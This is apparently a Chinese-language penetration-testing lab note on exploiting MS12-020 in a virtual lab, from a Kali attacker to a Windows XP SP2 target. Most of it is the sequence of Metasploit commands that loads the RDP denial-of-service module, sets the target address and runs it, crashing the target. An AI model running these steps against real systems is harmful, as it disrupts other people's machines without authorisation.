内网渗透笔记(三):MS12-020漏洞利用
前言:
漏洞介绍:MS12-020是远程桌面中的漏洞,如果攻击者向受影响的系统发送一系列特制RDP数据报,则这些漏洞中教严重的漏洞可能允许远程执行代码。(出自百度)
实验环境:虚拟机
攻击者操作系统:Kali Linux 2019.1
靶机操作系统:Window Xp SP2
一、扫描
- 使用Nnessus扫描靶机后发现存在MS12-020漏洞:
二、利用
- 进入metasploit控制台,查找漏洞:
search ms12-20
- 使用漏洞:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
- 查看攻击所需的配置选项:
show options
- 设置靶机IP:
set RHOSTS 192.168.188.123
- 运行:
run
- 靶机蓝屏: